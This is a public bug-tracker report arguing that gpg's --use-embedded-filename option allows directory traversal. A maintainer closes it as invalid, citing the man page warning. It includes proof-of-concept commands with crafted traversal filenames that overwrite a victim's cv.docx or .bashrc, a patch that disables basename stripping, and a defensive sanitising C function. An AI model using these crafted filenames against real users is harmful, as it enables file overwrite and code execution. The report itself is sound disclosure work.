
Directory traversal bug
Closed, Invalid (Public)

Description

Directory traversal bug

gpg allows for arbitrary file overwrite anywhere within a file system if a victim decrypts a file using the --use-embedded-filename option.
This could be exploited to allow for malicious code execution on a victim's computer by replacing files such as .bashrc.

PoC

Attacker:

$ gpg -er xxxxxxxx --set-filename "..\..\..\..\..\..\Users\AchmeUser\Documents\cv.docx" -o Attachment.gpg ./evilCV.docx

Victim:

C:\Users\AchmeUser\Downloads> gpg --use-embedded-filename Attachment.gpg

The same can be done against a Linux target by patching gpg's util/fileutil.c:make_basename() so that it does not perform strrchr for directory separators and thus allows / in the file name.

/* The reporter's patch to util/fileutil.c: returns the embedded name
   unchanged, so directory components and ".." are no longer stripped. */
char *
make_basename(const char *filepath, const char *inputpath)
{
    return xstrdup(filepath);
}

Attacker:

$ gpg -er xxxxxxxx --set-filename "../../../../../../home/achmeUser/.bashrc" -o Attachment.gpg ./evilbashrc

Victim:

$ gpg --use-embedded-filename Attachment.gpg
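As an added illustration (not GnuPG's code and not the project's fix), the check a decrypting tool would want before honouring an embedded name: reduce it to a single path component, treating both '/' and '\' as separators, and reject the special entries. The function name safe_basename is a hypothetical one chosen here; the inputs are the two embedded names from the PoC above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Return a malloc'd copy of the last path component of `embedded`, or NULL
 * if nothing safe remains.  Both separator styles are honoured so a name
 * crafted for either platform is cut down; a "C:" style drive prefix is
 * also dropped (conservative: a ':' is rare in a legitimate file name). */
char *safe_basename(const char *embedded)
{
    const char *p, *start, *colon;
    size_t n;
    char *out;

    if (!embedded)
        return NULL;

    /* Skip everything up to and including the last '/' or '\'. */
    start = embedded;
    for (p = embedded; *p; p++)
        if (*p == '/' || *p == '\\')
            start = p + 1;

    /* Drop a drive prefix such as "C:" that has no separator after it. */
    if ((colon = strrchr(start, ':')) != NULL)
        start = colon + 1;

    /* Reject empty names and the "." / ".." entries: they name no file here. */
    n = strlen(start);
    if (n == 0 || strcmp(start, ".") == 0 || strcmp(start, "..") == 0)
        return NULL;

    out = malloc(n + 1);
    if (out)
        memcpy(out, start, n + 1);
    return out;
}

int main(void)
{
    /* Constructed inputs: the embedded names used in the report's PoC. */
    const char *names[] = {
        "..\\..\\..\\..\\..\\..\\Users\\AchmeUser\\Documents\\cv.docx",
        "../../../../../../home/achmeUser/.bashrc",
        "..",
    };
    size_t i;
    for (i = 0; i < sizeof names / sizeof names[0]; i++) {
        char *b = safe_basename(names[i]);
        printf("%s -> %s\n", names[i], b ? b : "(rejected)");
        free(b);
    }
    return 0;
}
```

Note that the traversal is gone but the second name still becomes `.bashrc` in the current directory, which is exactly the overwrite the option's man page warns about; stripping the path does not make the option safe, it only confines the damage to the working directory.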

Details

Version
All

Event Timeline

werner added a subscriber: werner.

Let me quote from the man page:

--use-embedded-filename
--no-use-embedded-filename
        Try to create a file with a name as embedded in the data. This can be a dangerous
        option as it enables overwriting files. Defaults to no.

Thus we can't consider this a bug.

Indeed.
However, I am more concerned about the directory traversal, which seems to be unintended and unnecessarily dangerous.